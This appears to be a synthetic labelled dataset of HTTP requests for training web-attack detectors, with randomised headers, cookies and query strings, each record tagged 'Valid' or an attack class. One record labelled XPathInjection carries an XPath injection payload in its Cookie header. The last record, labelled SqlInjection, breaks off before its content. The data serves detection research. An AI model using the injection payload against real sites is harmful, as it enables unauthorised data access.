GET /tisouddShaneamaai/abAifkGBvJTNDUu_s7H/7Gqn/eH2urgNufD0c.xEOPZy.gif?Itg7e@=%27+oexecpvr1Amdt&Rntol8t=55&etevwyds=sa+&yMPfX64bLy=oBM&lUeFuauNn3maNe=io3t5&TnEkQ26Ve=94818725&Vt1nd9i7cdsi=52&haaxst=se&XNhdate=eastyle4l%5CFod&2usrdpdceHej=a272wG9&lrgemtts=evnrw&2p=cehi&psmhinhluteI=thuop%7Ee+eRbgsoundb7trw&ujr4e=un+EdfTepd+&mstaete5=io1B3I HTTP/1.1
Host: 59.92.172.167
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: windows-1255;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=996
Client-ip: 91.192.17.39
Cookie: oa=08;molrtoonltdStex=A ;cnmpc=7hatW9sdnO;i6dseoostnmsa=bH25;yo2noaYe=t%idC;cwJJautoexecIV=execshttpchildy3a=ilidneI)
Cookie2: $Version="21"
Date: Wed, 18 May 05 22:16:28 GMT
ETag: "LsESLOWvlf5dB@UN"
Expect: 100-continue
From: td9h@ogde.be
If-Modified-Since: Thu, 18 Dec 08 15:50:04 GMT
If-Unmodified-Since: Thu, 10 Mar 05 04:17:27 CET
If-Match: ".eqJHkKW_xoZorL0U"
If-None-Match: "o5MOIeF9fbEi_3f2Nlaa"
If-Range: Tue, 27 Oct 09 17:49:42 CET
Max-Forwards: 795
MIME-Version: 8.8
Pragma: 0t='dsseiIt'
Proxy-Authorization: Digest uri=http://oaaa.com/neutur/gmqe/y1hen1/oiewude2/t2mmveSO.pdf
Authorization: NTLM TWRvTG51ZXloYWtpdnhyZWNzc3JkZXRpYWE3aGkyaW5pcjFh
Range: 541-893,-04,-1
Referer: http://www.eups.com/suiRets/1oot/rrat/eEenh/edaN3t.html
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.3 (X11; U; Linux i586 7.9; ia-it; rv:6.0.2) Gecko/55366815
UA-CPU: PowerPC
UA-Disp: 0605,1336,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 112x1566
Via: HTTP/2.9 www.tsze7hse.js
Transfer-Encoding: gzip
Upgrade: aos/2.3, onrpu/3.4
Warning: 201 200.172.85.148 "uwxb7lfeBdn3mteneoad" "Thu, 28 Sep 06 02:25:40 GMT"
X-Forwarded-For: 56.17.27.167
X-Serial-Number: 570685869927204
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22368
Start - Id: 33172
class: Valid
POST /rh8kOe8Finr2un/5lsoHstiulTghaomEyN3/dVICuum8rHEz9s/s43jm5rUr9x3b8ulCZw_/azzoQs_nksH_Q/rlZL4h/am/5eneo0ilTn9tnezpyl4m/oflikeWB.gif? HTTP/1.0
Content-Length: 153
Content-Language: iNmm
Content-Encoding: gzip
Content-Location: http://reloN.it/eIeu/shhn3cte/1kha.cfm
Content-MD5: ZXN0cm5laDFhbm5tZGFzUw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Oct 07 21:34:50 GMT
Last-Modified: Mon, 16 Oct 06 04:04:03 GMT
Host: 60.104.6.229
Connection: keep-alive
Accept: image/jpeg;q=0.7, text/*
Accept-Charset: windows-1250;q=0.3, windows-1258, cp-932;q=0.1, utf-7
Accept-Encoding: *;q=0.9
Accept-Language: itorigo-ifdl;q=0.2, noi-alrp6
Cache-Control: no-transform
Client-ip: 92.73.142.115
Cookie: soeye7sRrt2=openftpCebhlaj;RmeroelnccAR3=sXNAZN;tAanetwh=6435;TRGinDzWZ=wmrk;da=edc
Cookie2: $Version="78"
Date: Sat, 14 Aug 04 12:49:13 CET
ETag: W/"bEuGyo5d4M9BNLFduy"
Expect: ew3N=Ishr
From: ntsrj@mDKe5itb.net
If-Modified-Since: Sat, 10 Jun 06 01:39:22 CET
If-Unmodified-Since: Tue, 21 Jun 05 10:59:43 GMT
If-Match: "u7q2oWdrZPljovtQGD"
If-None-Match: "cG.e9LfG3ubK.Xpa"
If-Range: "8NpLt55cq51Ixc4D"
Max-Forwards: 77
MIME-Version: 3.5
Pragma: aioict=edsttnsl
Proxy-Authorization: Basic dnQxcjo0YWF0RXMwcg==
Authorization: NTLM b3hzMmRxZmZlYTJjbnRzdGVpaXRraWFpdGZ0c2xvYXBpdGtBN2hvaW9lT2U=
Range: 913575-,-052
Referer: http://uywaC.net/c8redam/fgw6eau/fedlw/pomt2/nt8b3fs.asmx
TE: chunked;q=0.1,gzip;q=0.4
Trailer: If-Range
User-Agent: Mozilla/8.5 (compatible; MSIE 1.3; Open BSD i586; Nhwuaa; le6bhldjz)
UA-CPU: PowerPC
UA-Disp: 3344,7896,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 168x064
Via: pnsnTm/1.8 111.126.164.26
Transfer-Encoding: compress
Upgrade: afteyP/8.9, csc/8.1, exortn/7.3, erha/8.6, aschS/4.3
Warning: 008 6.86.95.176 "mrie" 
X-Forwarded-For: 121.78.223.99
X-Serial-Number: 0421946796861302632
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iWiiwempTs=2077&PHfUj9b=lse&gtsqnrhrenyIl8a=and&9IQeH=95&ssa2osmhl7n=70&eezido=jce5z&adtnibent=3<&t2mssu=t6Ki&so=u8aIvecunesihunao&itfkw4ee==t 3h7noc

End - Id: 33172
Start - Id: 846
class: Valid
GET /swttirntcigliroosia/yKM4Bzt2updatexHSm/al1oT7dowhenntehi6ed/VsCL/mi.php? HTTP/1.0
Host: www.i59uetoe.cz
Connection: ntmewe
Accept: application/*;q=0.7, video/quicktime;q=0.1, audio/*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: krAaac-ic6letgc;q=0.0
Cache-Control: no-transform
Client-ip: 231.122.176.128
Cookie: vfo1=yry;m3Pxa4=nHFS-;4btk3AsoshesOd=z;st1a=98
Cookie2: $Version="3"
Date: Tue, 07 Oct 08 09:29:58 GMT
ETag: "@kve1qUdLGZFJs8I"
Expect: 100-continue
From: envhv@ba7pe.biz
If-Modified-Since: Fri, 11 Feb 05 13:17:24 UTC
If-Unmodified-Since: Fri, 15 Apr 05 14:16:26 GMT
If-Match: "@1WNQmSozVbIWs_q"
If-None-Match: "y55f75mDKJEHKNj"
If-Range: "qgXIa.ycvhAFbtiQ"
Max-Forwards: 372
MIME-Version: 3.5
Pragma: T=ce6age
Proxy-Authorization: sn9E aMqktn=tie3y
Authorization: 3scw pM4ircEt=sr1eLamt
Range: 264605-828,9-,3-
Referer: http://www.prr1mee.com/miigt/nlOx/wrtni/gtphh.tiff
TE: gzip;q=0.5,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/4.8 (X11; U; Open BSD i586 4.6; df-Ft; rv:4.9.6) Gecko/40970610
UA-CPU: x86
UA-Disp: 486,0670,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 130x106
Via: HTTP/0.2 www.ietni.png, HTTP/4.1 www.csa8t.gif:05, HTTP/6.3 www.orpaixti.jpg
Transfer-Encoding: deflate
Upgrade: ilos8/9.8, esd/4.0, qkt0te/1.0, rr4fN/4.6, Hu9cs/3.0
Warning: 143 157.105.202.150 "sEsibsATArcahcgbo" "Fri, 23 Jun 06 19:18:43 UTC"
X-Forwarded-For: 44.170.70.161
X-Serial-Number: 510626783025324042
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 846
Start - Id: 25681
class: Valid
GET /adPBOpSaLTYe/adodactsno.asp?ze0=tzI&@.ceftmpWC4ypU=nph-+&_s4U=baS&4to0rst=aTl9J.&ulsbulqIPmowkL=93085&agrnl=9j0 HTTP/1.1
Host: www.pnipT.de:06903
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-jp;q=0.5
Accept-Encoding: identity;q=0.0, identity, identity, compress;q=0.2, deflate
Accept-Language: *;q=0.5
Cache-Control: min-fresh=64
Client-ip: 131.48.176.78
Cookie: hMteo=0;4toototmig=copyEde
Cookie2: $Version="037"
Date: Thu, 14 May 09 20:23:21 CET
ETag: "EnPc9wAlgx50olt-uqnk"
Expect: cseho8n8
From: laala@ednnyR.org
If-Modified-Since: Fri, 06 May 05 03:24:06 CET
If-Unmodified-Since: Wed, 28 Jun 06 09:57:08 CET
If-Match: "r7o5GjI21S_NMIhP"
If-None-Match: "Jz82@GaqHAh4SV4Ptal"
If-Range: "4jf7RbKgkk.1bvtlB"
Max-Forwards: 8813
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: ed7c eaaxe=zcoeth
Authorization: NTLM anRGZjJ1Y2Vhd2h0ZnJoY2FvbzdlYzhjb29OaGVFYWlrcHlobjROdA==
Range: 020-689,-92469,-2
Referer: http://owow.gov/tieit/EooItro/ooc0nec/m2ste/st5hb.ace
TE: trailers
Trailer: If-None-Match
User-Agent: 6TV1KyMLw http://www.l4leot.com
UA-CPU: PowerPC
UA-Disp: 564,067,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8973x257
Via: t9r1h/6.8 47.35.243.23:79, erfa1n/7.9 197.179.89.41
Transfer-Encoding: compress
Upgrade: src/0.7
Warning: 473 www.arroi44e.png "m5ao1xhonpTIDgipma3b" 
X-Forwarded-For: 188.103.199.94
X-Serial-Number: 33104741
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 25681
Start - Id: 28252
class: Valid
GET /dRdMT1fpyFonME@OCL/oIJhNvkL65Da/eelfhHhHky/ohCCW3m@VS/8p/eMuxNntoedib.pl?aopBhreas=neu&N1HLPdQ=12896311&xmlKKBCj2llO=atelnetapassthrue8%5DsR3SFhwr&sT1zjrnttjd=tsamkepp%26uexecopenboo&Gqj7objectFqFwl=9463463&h1odeiaese7=27142&9hs3s2R3imtU=0&o8REibdvuOss=ynv+&WS2MGo78m2@b=o&r62washqie=noeieseslyt&udmiui03eo=4&sdiEoc2eit=bH2gqWbLw-x5&agiTN1tioboi=atejaed9sa&uA3z=5WqbhNyZt HTTP/1.1
Host: 19.101.168.131:80
Connection: bnQ4EtE
Accept: */*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.0, compress, compress;q=0.6, compress
Accept-Language: wrr-n, ty2i-scu;q=0.8, e-ravioUol
Cache-Control: y='kieeh'
Client-ip: 141.31.102.223
Cookie: 2uuaegnRvyyo=98;9wgetFSyB5t=&imailain;NYQ7hIorR=305;slt=eeutdyhpucr5ht;eEfsny=51798807
Cookie2: $Version="316"
Date: Thu, 02 Mar 06 15:47:32 UTC
ETag: W/"h5RyVwb5Q-2_w1WV@d6F"
Expect: ibTp1t=svzsd
From: okoeas@anfr7lr.uk
If-Modified-Since: Sat, 21 Jan 06 15:36:02 CET
If-Unmodified-Since: Sat, 11 Nov 06 09:14:08 CET
If-Match: *
If-None-Match: *
If-Range: "fNMZG7UoN8N0Ft-QaoNT"
Max-Forwards: 4924
MIME-Version: 8.6
Pragma: nHd='tiDeant'
Proxy-Authorization: 8m0ruo i80slon=1V7ru
Authorization: NTLM Y2FvdHJ1bjdyMW5hM25hZW1scDcydHlvYXNydGZlYlZ4bW91YThvbnRpaXV0
Range: 29956-,-15205
Referer: /nnea/aacnd.doc
TE: trailers,deflate,chunked;q=0.1
Trailer: Accept-Encoding
User-Agent: rekr8lu (ofLk@bBX; t4P0ZO)
UA-CPU: PowerPC
UA-Disp: 5435,696,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 0895x834
Via: 5.2 www.gnrup.gif, 2.4 www.oB8suldr.gif, 1.1 www.wBl1.htm
Transfer-Encoding: tnaen; rrme=nd7Nnod
Upgrade: 0annoh/0.5, hzia/9.6
Warning: 334 0.64.248.123:76205 "otiprr" "Wed, 15 Aug 07 02:30:33 UTC"
X-Forwarded-For: 209.67.183.110
X-Serial-Number: 144317661774202
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28252
Start - Id: 24891
class: Valid
GET /ntXX.lkp@@J.hI_/XUupdatetmpH2m/ykS/4JJD4r/8DcnJUY9OC/dbxbteatellrQuE/ZoolLah819KAo/ntnirndlltl64Lr/ajJQ8V@lvLr/r95laimr5ni/u-y.jpg?2uefea=10&iir7mysmi=8503648425&rwepacbaatcaJn=execp HTTP/1.1
Host: www.ereeg.de:80
Connection: close
Accept: image/gif, image/gif, video/mpeg
Accept-Charset: x-mac-ce, windows-1253;q=0.9, iso-2022-kr;q=0.1
Accept-Encoding: *
Accept-Language: DltKfoh-aei7i, ecnd-ites
Cache-Control: no-transform
Client-ip: 173.219.45.141
Cookie: oqeh5bMado6K=idla@;3nhqRaausodto=027273980;hhdmadrqh9t4=ecx;uhshlaAocaoei=asiyoae;2OlPeT7arpa1aws=oresnwinntsmeFtO+ni7
Cookie2: $Version="237"
Date: Sun, 05 Dec 04 03:03:03 CET
ETag: W/"M9LLDBmc9Zgl8Ix9WT"
Expect: 100-continue
From: jetanin0@wfha2rk3x8.biz
If-Modified-Since: Fri, 08 Dec 06 08:12:48 GMT
If-Unmodified-Since: Wed, 12 Nov 08 24:36:38 UTC
If-Match: *
If-None-Match: "54QuxZNLBTnx2ETkAP.Y"
If-Range: "ho.cAF06SQP9IoGz@"
Max-Forwards: 4
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: NTLM a2Vlc2kwZWRkc2Rlb21vYnJvMHVvYmFFeHVjN3NlbWhuYmhjYg==
Authorization: pTha yasnsem0=nidw7Ie
Range: 16122-,024603-0,-592
Referer: /anon/Edo2/ARmmee.cgi
TE: trailers,deflate
Trailer: If-Modified-Since
User-Agent: eSpJbeYP http://www.z93eadee.fr
UA-CPU: MIPS
UA-Disp: 8792,070,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0163x5496
Via: 5.5 147.55.236.24, 0.6 240.58.156.207, ogyeTt/9.1 www.82yrP.jpeg
Transfer-Encoding: gzip
Upgrade: ugisg/3.7, yocphl/3.6, nfya/7.3, hem/7.5, kyuo/3.8
Warning: 072 www.nEart5nd.tiff "iSagndoa48E" 
X-Forwarded-For: 45.246.59.205
X-Serial-Number: 5477334
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24891
Start - Id: 35499
class: XPathInjection
GET /enL6QpkHn/lPLhjeqhln6l3tt/rA.eHm.ptUjyVX/djI.aVL/sq0jry0yPAkdjy/hCGU/gwq/bPySoF/jboUJmQi3N0VR/3OXOIwUf4sLdCkMw6uD/re1tHpinnb4qmsdee1/iY@aHmE4phJOhmsLv16N.php4?etrnArm=0&de5ttlt=tgrcE&EuEtpaxmEehtss=30&nfdexdenrfreaTn=h&ofom9cnINas=aby1m&cutosbFqrzhtNs=processing-instructionc6%3Cte&sat05c9a=rSOGuU&St=h%3C%5C%3Bdtouiinputd&eahuaoaahCfmnr=nrmailcyyi&utsirlMwlhpa=nK8x9_HEu&ss=fo8QYb9Nku%40Q&rn=it%407&wsrwe=8751140 HTTP/1.0
Host: 120.171.28.73
Connection: 7mherhe
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, deflate
Accept-Language: gpad9Zeh-hi, H-li;q=0.9, dgoh6i-tiituoh;q=0.7, spq-eci
Cache-Control: max-stale=2
Client-ip: 209.250.192.160
Cookie: arHUofiAo=vaniI/lfx/tbrI/child::node()[position()=9]     or 'oTt'    =    ';9ssns9lcrraq5r9=e?e[eetis)ttd;Vfzx8WTfK=aqNiwtb;5thcdinrdmte=3018621;SaftLf0be=61836;aCmpziy=J@cRecstks
Cookie2: $Version="53"
Date: Mon, 22 Dec 08 21:43:50 UTC
ETag: W/"l_VEy1HDITbAwiaUfCa"
Expect: n3serr=yceoeeS;qmTsss=deunoaTt
From: a8rg@iaaSadh.uk
If-Modified-Since: Tue, 03 Apr 07 11:40:06 UTC
If-Unmodified-Since: Thu, 21 Feb 08 13:32:07 UTC
If-Match: "rQad.Gq7ugRmTibkt"
If-None-Match: *
If-Range: "xxk_F6S4DzdUAkI4"
Max-Forwards: 98
MIME-Version: 8.9
Pragma: Ev='sh5zzeze'
Proxy-Authorization: Basic UXVtaXBuOkNhc2RyZXRl
Authorization: Basic Ym5pcHJyNTpPb1Vs
Range: 2-37781,-037,39-
Referer: /Caow.php4
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/4.2 (compatible; epteeoEij; Windows NT; etht; otnnsjmats)
UA-CPU: Sparc
UA-Disp: 8924,467,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 470x662
Via: 1.9 176.137.236.36:3406, 4.5 www.Sctk.png:823
Transfer-Encoding: ebr76; ut51g=htlohZ4
Upgrade: l7Aui/5.3, eeBCtt/3.9, 3iy/7.7
X-Forwarded-For: 184.57.165.17
X-Serial-Number: 480631962550690489
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35499
Start - Id: 21278
class: Valid
GET /aNBmiO/sadeuYezhsahdhiY/aEQ@dnwyu1/sWrDb/ohuNT7eiebela2m/t0zmgoYmNB/hdMhfv_uKB9ixml/akreecg3eteitdtCu/a9k9hOAE/fen4eihpEIIsefxah/Kjl40y89ArvGk.css? HTTP/1.0
Host: www.g5rt.fr:8
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.8, compress
Accept-Language: r-tE, rtrq-ieooZubE, nienieto-zHe;q=0.7, tugo-n4;q=0.4
Cache-Control: min-fresh=4
Client-ip: 83.86.54.168
Cookie: wiHaslan=53288443
Cookie2: $Version="144"
Date: Mon, 22 Oct 07 10:46:24 CET
ETag: "HPxL4jZpZyyUG8R9TSXv"
Expect: hOsusai=daoao;7tesylm=de1l
From: dio0@laae5ent.cz
If-Modified-Since: Sat, 28 May 05 21:32:33 GMT
If-Unmodified-Since: Sat, 30 Apr 05 09:14:08 GMT
If-Match: "oAJR50bR4F550eVUJ"
If-None-Match: "E1hmU8d1iljjqmg"
If-Range: "pEzXJ@kjy4bEXPKAV"
Max-Forwards: 8
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="2acwtna"
Authorization: Digest opaque="9eainrri"
Range: 01887-
Referer: /2fyta.swf
TE: deflate,deflate;q=0.9,trailers
Trailer: TE
User-Agent: edeghwu
UA-CPU: PowerPC
UA-Disp: 552,365,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 714x7693
Via: 1.1 www.natcv.shtml:316, 8.7 www.ahsuptsc.gif:7855, lh0ons/6.6 www.aateatt.png
Transfer-Encoding: deflate
Upgrade: Y7erUa/4.3, nwp/5.4, bdua6/0.7, sSr7/6.4
Warning: 031 41.122.125.127:7076 "Eiaoenuons" 
X-Forwarded-For: 172.206.4.103
X-Serial-Number: 900444
----: --------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 21278
Start - Id: 16401
class: Valid
GET /b.rE/izv8Pg/Uoyt_M4S2m1s_/hJY@DGYrvtufsB/@JU2/nr.shtml? HTTP/1.0
Host: www.edyxe.it:80
Connection: utha
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 129.156.31.222
Cookie: eThnwac4=0vX;aGorhd=0655;eisaa=aCrHoaCFq
Cookie2: $Version="436"
Date: Thu, 01 Oct 09 04:14:47 GMT
ETag: "0ANVdsHN9KglmZudWy"
Expect: 100-continue
From: fsemnT@5ahWi.net
If-Modified-Since: Tue, 15 Sep 09 10:10:09 UTC
If-Unmodified-Since: Fri, 11 May 07 08:12:49 CET
If-Match: "ONStIcmdi1ihdr@2n"
If-None-Match: "aUTotrWjaPQDHG0"
If-Range: Fri, 05 Aug 05 08:00:13 GMT
Max-Forwards: 8943
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM czJUaTVld0hpZ2gxbjhnbnAyMWd0aTduaXJudWVFUWVydGFpc3M=
Authorization: Digest qop=auth-int
Range: 9-3931
Referer: http://sgore.net/moDgp/ecrnsseI/ta34oeca/eilo.asp
TE: deflate,deflate,gzip;q=0.7
Trailer: From
User-Agent: nriteg
UA-CPU: MIPS
UA-Disp: 227,815,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 9846x663
Via: 5.6 40.174.225.242
Transfer-Encoding: deflate
Upgrade: Or46/0.2, nsn/5.8, nEiiOe/8.0, Tldds/1.2
Warning: 481 www.dsiixEh.shtml:370 "isiipeE" 
X-Forwarded-For: 199.139.34.29
X-Serial-Number: 5481271353118244328
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16401
Start - Id: 3761
class: Valid
GET /hlNngoNiXnent/fA-kG3/soznfITq-dNyop/oeNt.asp?i0e6nezeprvhAl=48&0httoae=5086&irooOe=r%3D++6w&IjEe3ue2t=nFaAT7.oDYSn&_27yzW.Y=02760946 HTTP/1.0
Host: 73.31.201.241:80
Connection: edsjjH
Accept: application/*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 133.193.120.30
Cookie: ielottnchsiorh=s4uNd33hi;6oe=5
Cookie2: $Version="742"
Date: Tue, 01 Jul 08 20:22:18 CET
ETag: W/"G8STgf-fSVE.G9zO"
Expect: Hnltifte=gEgrN;rweba=dmmta
From: t3r8@0e5kkbee.de
If-Modified-Since: Tue, 10 Apr 07 03:07:48 UTC
If-Unmodified-Since: Wed, 04 Jan 06 08:22:22 UTC
If-Match: "HFrX1OXSvaSD14b."
If-None-Match: "oJjpkKxZeSZB0@F-lCW6"
If-Range: Mon, 20 Dec 04 14:36:51 CET
Max-Forwards: 258
MIME-Version: 0.5
Pragma: ocuyoyw=itLmehF
Proxy-Authorization: d7tg8 ePiym=ryti
Authorization: i3rhtg aoknT=cenOm
Range: 106-087945,9846-
Referer: /Pfrhbico/ue7eE.tar
TE: chunked;q=0.3,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/6.2 (compatible; Konqueror/0.9; Linux i386; ecsws)
UA-CPU: 68000
UA-Disp: 599,9039,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 0475x7705
Via: nwah/1.3 92.117.221.219, AarneE/1.8 98.241.120.209
Transfer-Encoding: compress
Upgrade: nan/5.7, Onp/4.3
Warning: 204 www.TminD.js:402 "chea9eo" 
X-Forwarded-For: 2.28.238.117
X-Serial-Number: 68867877
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 3761
Start - Id: 6632
class: Valid
PUT /0N-CC8Wform0A/2freirbheestob9n/nsIearrnug/a7t/breuDNainlnnKYitanc/e0Stc4ilNe/rZRy/EEwp-N@w.cfm? HTTP/1.1
Content-Length: 16
Content-Language: lr
Content-Encoding: identity
Content-Location: http://www.eR9xiwef.fr/cnSitn/ceme/punghnO.html
Content-MD5: TDdiOXQxaGVjbmNvdG5Ecg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Feb 09 03:00:58 GMT
Last-Modified: Mon, 22 Jan 07 16:13:48 CET
Host: 239.13.13.253
Connection: U3oG
Accept: */*;q=0.5
Accept-Charset: utf-8, iso-2022-jp;q=0.8, iso-2022-kr;q=0.7
Accept-Encoding: gzip;q=0.1, deflate, deflate;q=0.8, deflate
Accept-Language: meadusbe-s0iRsmh;q=0.7, ooroasni-mRNIehes, OiIu-pXeah, r-yni, adhwt-e;q=0.8
Cache-Control: max-age=5
Client-ip: 46.201.126.153
Cookie: mTrobxItanouhii=s%ue;cmleiattNmrphd=0bHhoyqreoatlMiuc;gcrnpr6eapni=999107485;a3Ft91sc0KEmz=00588366
Cookie2: $Version="882"
Date: Sat, 20 Sep 08 09:30:03 CET
ETag: W/"PJERZnLv-AkghuUrXwDr"
Expect: 100-continue
From: opcra@uqeH.it
If-Modified-Since: Sun, 21 Jan 07 06:00:38 UTC
If-Unmodified-Since: Wed, 17 Nov 04 24:20:52 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 27 Feb 06 04:12:12 UTC
Max-Forwards: 8
MIME-Version: 0.0
Pragma: as='xreimoed'
Proxy-Authorization: NTLM cnp1Z3NpYXNmYlVvZWhvZWN0am5zYnZyckR0ZVpod2x0dHM=
Authorization: Digest cnonce="eeinnoTd"
Range: -08,-241,7-856
Referer: http://hApt20an.org/tnroRon/nbi8eo/tahsNsa.php3
TE: trailers,chunked;q=0.3
Trailer: Pragma
User-Agent: orZCWRS http://www.eacureai.be
UA-CPU: MIPS
UA-Disp: 7646,961,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7771x7068
Via: 0.6 83.235.29.58
Transfer-Encoding: identity
Upgrade: rvt/4.2
Warning: 372 131.35.101.58 "dAwcwc3hitToiy" "Wed, 29 Mar 06 22:18:03 GMT"
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 1883916310
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

3irC=gxiQnq85SG8

End - Id: 6632
Start - Id: 336
class: Valid
GET /RCcOguPL71MD/rmikYY5zN9/eGxjK2AL7yHAPzr1/nd0eshtqiRBit/iWwg@j2nkPqTCs3DuKuD.asmx?oi5inwehokeoE=ti&raiub=aUYLcMNHz9 HTTP/1.1
Host: 121.250.247.126
Connection: eond
Accept: */*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: addix-n5T;q=0.2
Cache-Control: only-if-cached
Client-ip: 122.102.33.167
Cookie: @-qK-kyBjxN.=k=null
Cookie2: $Version="950"
Date: Fri, 17 Oct 08 07:07:44 UTC
ETag: W/"zxMVFeGsO-szSO5fl"
Expect: 100-continue
From: yifn@s7icOeis.org
If-Modified-Since: Sun, 04 Jul 04 06:04:27 GMT
If-Unmodified-Since: Fri, 16 Sep 05 22:29:38 CET
If-Match: "afR3ph5UQVrX9qu1M7Y"
If-None-Match: "YU_@4W2UYui0M_hek-c"
If-Range: Fri, 18 Jul 08 07:30:07 CET
Max-Forwards: 29
MIME-Version: 1.9
Pragma: LrBl=ncgasut
Proxy-Authorization: Basic ZHJzaW5lRWU6ZWV0RTEyaw==
Authorization: Digest nc=fE6f1599
Range: 3228-,768696-30994
Referer: http://www.vtkdemU.gov/Obtiwt6h/etAu/ungAes/tcnshs/ilO9.swf
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/0.3 (Machintosh; U; PPC Mac OS X 6.9; fe-he; rv:8.9.3) Gecko/23868605
UA-CPU: Sparc
UA-Disp: 6838,2277,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 170x4525
Via: 3.9 www.rhe3y.tiff
Transfer-Encoding: identity
Upgrade: rif/8.1
Warning: 065 www.andsxH.js "Etsas1arbstnjlte" 
X-Forwarded-For: 128.82.39.150
X-Serial-Number: 2216380561950619678
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 336
Start - Id: 1699
class: Valid
GET /ewMa5/qqfHZbAQPoVz/OuS/aJ2g_gBu/eMltss/tZNH4/onaateaIiatFd/acnikaRybvfd.tiff?ssscol2=9&ysatlwmvrisahte=oinsertiM&dnlir=c5iOlTciXi4I&ofgseu1C=connectsed&ePnyrsr9e3h5=ls7r0a5seB HTTP/1.0
Host: 208.151.189.173:100
Connection: ihuissnt
Accept: image/*, application/x-tar;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale=52
Client-ip: 125.202.6.4
Cookie: Swteeceo7nd=oyz4pg-jVK7e;Na1satdse0pai=4023797503;QCwstdinwD@c3wK=sitaat
Cookie2: $Version="8"
Date: Mon, 03 Mar 08 03:14:34 GMT
ETag: "inLrxWM@mNFQI7t"
Expect: 100-continue
From: arsesfWq@lnrrmrt.com
If-Modified-Since: Sat, 13 Feb 10 23:45:48 GMT
If-Unmodified-Since: Fri, 17 Jun 05 11:37:22 GMT
If-Match: "O0DMp_ZqjahsKSItPa"
If-None-Match: *
If-Range: "JCofTTam8effiFmWjbR"
Max-Forwards: 33
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic eTVlcmtsYjpkRWRhaQ==
Range: 73-
Referer: http://www.knoaidrt.st/cnoaoe/u0icthpO/tgnipn.dll
TE: trailers,trailers,chunked;q=0.4
Trailer: Accept
User-Agent: Mozilla/8.6 (X11; U; Open BSD i386 3.8; si-ht; rv:8.5.6) Gecko/31858857
UA-CPU: StrongARM
UA-Disp: 6638,4343,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3865x207
Via: 9.7 17.52.171.82, 8.6 www.cihet0.tiff, stsee5/9.8 184.20.237.12
Transfer-Encoding: 0sueRp; eaaie=etsnata
Upgrade: 0oonn/2.7, 9Sodn/5.7, e7etni/1.7, evi/5.4
Warning: 425 www.piy5p.jpg "97tbtycyai6p" 
X-Forwarded-For: 53.157.224.180
X-Serial-Number: 3355979393710804862
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1699
Start - Id: 35309
class: SqlInjection
